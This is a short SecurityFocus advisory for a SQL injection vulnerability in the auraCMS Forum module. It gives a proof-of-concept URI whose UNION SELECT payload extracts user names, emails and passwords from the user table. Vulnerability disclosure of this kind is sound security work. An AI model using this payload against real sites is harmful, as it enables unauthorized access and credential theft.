Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

auraCMS Forum Module Pilih.ASP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/AuraCMS/?pilih=forum&mod=yes&aksi=komentar&id=-9%20union%20select%201,user,id,4,email,password%20from%20user/*







 

Privacy Statement
Copyright 2009, SecurityFocus